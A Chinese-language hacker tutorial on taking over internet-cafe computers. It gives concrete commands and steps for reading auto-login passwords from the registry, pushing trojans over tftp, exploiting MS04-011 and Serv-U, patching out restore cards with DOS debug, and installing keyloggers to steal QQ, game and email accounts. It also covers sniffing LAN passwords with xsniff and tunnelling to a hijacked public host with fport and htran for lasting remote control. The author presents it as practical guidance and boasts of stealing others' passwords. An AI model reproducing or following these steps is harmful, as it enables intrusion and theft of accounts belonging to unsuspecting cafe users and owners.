網吧入侵之攻無不克！

作者：hacker.a… 文章來源：hacker.ab8.cn

經常看x檔案，發現關於破解pubwin和永珍的文章比較多，今天我決定寫點網吧入侵方面的文章，希望對一些小菜有所協助.

一. 網吧入侵

入侵的方法很多，但對網吧入侵最常用的方法是什麼呢？首先，自動登陸。現在網吧一般都是win2000或者windows xp的機器，網管一般都把機子設定為自動登陸！這樣我們開機進入系統的時候登陸視窗一閃而過！著時候如果我們findfass.exe試圖把登陸帳號密碼找出來是不會成功的！因為帳號密碼根本不在記憶體中，而findfass.exe通過winlogon的PID號和正確的網域名稱中，在記憶體尋找好段加了密的記憶體塊(儲存著加密過的登陸密碼)，然後對它進行解密，這樣就能得到明文的密碼。實際上自動登陸的帳號密碼都在註冊表中。我們開啟註冊表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\這個目錄下，AutoAdminLogon這一項的索引值為1，表示自動登陸。為1的時候，開啟控制台的使用者和密碼，會發現要求輸入密碼前面的鉤已經去掉了。DefaultUserName對應的索引值就是登陸使用者名稱，DefaultPassword對應的索引值就是登陸密碼。實際上海洋頂端木馬2006就有著一功能，原理是一樣的，不過因為許可權的問題，不一定能讀出來。這樣，密碼帳號我們都找出來了。而且你要知道，一個網吧的自動登陸密碼帳號一般都是一樣的，而且網管為了方便網蟲上網一般把他們設定在Administrator 群組，至少user組。知道了密碼帳號還愁入侵不了嗎？網吧機子的server服務一般是禁用的，那我們就不能用ipc入侵了。opentelnet.exe我們也用不了，因為著個也依賴ipc串連，dameware遠端控制也不行，道理一樣。我們可以用recton著個小巧實用的工具來開telnet，這個工具在win2000下面特別好使。

1。

開了telnet後，我們telnet上去，先在本機開啟tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,這樣就把我們的木馬3721.exe比如radmin傳過去了。

再在telnet下面直接運行3721.exe就ok了。

　 另一個方法就是ms04011漏洞，別以為著個漏洞已經過時了，在網吧這個漏洞還是相當普遍的，許多網吧的網管只會裝遊戲，重裝系統，不重視著寫漏洞，懶得打補丁！我們用DSScan掃描192.168.0.1-192.168.0.255,一般會你會很驚喜的。我們到用ms04011溢出工具溢出，一下子就得到了系統許可權。

3.

　 還有很多入侵方法，你可以把xscan搬出來掃描一下。很多菜鳥喜歡用啊D工具包來掃網吧的空口令，實際上這個工具掃使用者帳號密碼很弱，以前我試過，我用上面第一種方法發現網吧都有一個密碼為空白的管理員帳號，用啊D工具包只掃出幾台機子有這個帳號。我經常用我的最愛

閃電狐——Firefox連接埠掃描器來掃一下網吧主機，第一伺服器等。著個掃描器速度很快，掃1到10000連接埠也要不了幾分鐘。如果探索服務器開80斷口，自然是看是不是架設了網站。再看網站十分有漏洞，想辦法傳個asp木馬上去提升許可權。如果發現電影伺服器裝了serv_u,而且你有了一個帳號，可以嘗試一下serv_u的溢出。

　　　　　　　　　　　　　　　　　　　　　　　　 二.網吧牧馬

在網吧安裝木馬最重要的是把它的還原破了，現在網吧的還原系統一般有3種，即還原卡，還原精靈，冰點還原精靈。硬碟還原卡其實所謂硬碟保護卡就是在ROM中寫了一段HOOK INT 13的程式，屏蔽了

一些功能調用如AH=3，5等，在中斷向量表中INT 13的SEG，OFFSET

描述為[13h*4+2]，[13h*4]，將此中的程式先儲存後，再替換為自己的代碼，

當你AH=2的時，它便會call原始INT 13地址來完成(商周)作.

只要找到原始INT 13入口便可以為所欲為.

具體過程如下:

開機過程按住F8鍵,進入純dos環境, 注";"後為注釋.

出現提示符c:,

鍵入c:\debug,

- a100

- xor ax,ax

- int 13

- int3

; 尋找原始的int 13入口.

然後輸入t斷行符號，不斷的重複，直到顯示的地址形如 F000:xxxx

,後面的指令為:mov dl,80 (練練眼力-。按q退出.

記下這一地址, 在(0:13H*4)=0:4cH 處填入這個地址。

例如俺的得到的地址是F000:9A95

再次運行debug ,鍵入:

-e 0:4c 95 9A 00 F0 e的作用將資料表"95 9A 00 f0",寫入地址0:4c開始的位元組中.

-q

註： 填的時候要仔細，填錯的話會死機。ok,破解完成.

這時在提示符c:\鍵入

c:\win

進入windows系統即可,那麼這次你在windows系統中的一切(商周)作,隨著下一次

的啟動都會被還原卡儲存起來。

這種辦法大家都知道，不過操作起來也有點危險，弄不好啟動不了。而且win2000沒有dos環境,到底性不行呢？呵呵，我還沒有

做這個危險的嘗試。不過望上有很多關於破解還原卡的工具可以下載，到底什麼工具最好使，大家自己測試。

至於還原卡，網上有密碼讀取器，不過著工具只能在win98下面使用。在win2k下面我們可以用winhex來破解，次方法很奏效，

應該是最好的辦法。先隨便輸個錯誤的密碼，彈出錯誤視窗後不動，用winhex尋找主要記憶體，找到還原精靈，再搜尋我們開始

輸的錯誤密碼。在錯誤密碼的旁邊應該就有正確的密碼。我們輸入正確的密碼轉存就行了。這裡很簡單，就不了！

　至於冰點還原，好像還沒有破解辦法，這個的確很厲害。不過他有個選項，就是重啟多少次後不還原，沒事你可以多重啟

試一下，別把機子整壞了就行。

　破了還原後就裝木馬了。我們最好裝鍵盤記錄或密碼截獲木馬，盜qq，遊戲帳號，郵箱帳號等等。比如密碼結巴等工具，也可以

把瀏覽器預設首頁設定為你的網頁木馬。如果網吧的預設首頁都是一樣，而你有能力入侵了那個網站，在預設首頁上掛馬那更好！

三.網吧嗅探。

　如果你想知道網吧某個mm的qq號，那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用於嗅探域網中或原生pop.smtp.ftp等明文傳輸的tcp/ip協議密碼。格式是 xsiff.exe -pass -hide -log pass.log　xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜歡著個，還有個密碼監聽器，密碼監聽器用於監聽網頁的密碼，包括網頁上的郵箱、論壇、聊天室等等。只需在一台電腦上運行，就可以監聽區域網路內任意一台電腦登入的帳號和密碼，並將密碼顯示、儲存，或發送到使用者指定的郵箱。我就經常有密碼監聽器2.4破解版在網吧監聽別人

密碼！當然網吧最適合dns欺騙！

3。

四.連接埠轉寄。

　為了能隨時隨地控制網吧機器，在家也可以！我們最好來個連接埠轉寄。首先我們可以用fport.exe(這個工具在angelshell1.0包裡面有）,格式為fport 但是使用他可以不必安裝後門，只需要普通的許可權即可執行。網吧伺服器一般是win2000server版的，我們趁管理員不注意，給他開3389。如果他的ip為192.168.0.1，我們就在他的命令列下執行fport.exe 3389 myip 9999,這裡的myip可以是我們的一隻有公網ip的肉雞。我們再在公網ip的肉雞上運行FportClient.exe著個是用戶端。著樣我們登陸公網ip的肉雞的9999連接埠就進了網吧主機。在上面看第電影趕什麼都行，不被發現就行了，我們動作輕點就行了。我們也可以給網吧主機裝代理。就用htran2.4,SocksCap。在網吧主機命令列下上執行htran.exe -install （安裝Socks5服務），htran.exe -start （啟動Socks5服務），再執行"htran.exe -s -connect 共網肉雞ip 3389。在自己的共網肉雞上執行htran.exe -s -listen 3389 5200（監聽連接埠）.現在用SocksCap串連 218.3.1.1 的5200連接埠，就等於進入了網吧主機。我們也可以

用vidc來映射連接埠，這個和fport差不多就不多說了。

到這裡本文要結束了，其實也沒有什麼高深的技術，高手見笑了。其實入侵的時候會碰到各種各樣的問題，能否解決這這些問題。是高手和菜鳥的本質區別！希望喜歡交流技術的朋友和我聯絡，我的qq是：156544632。我的站

轉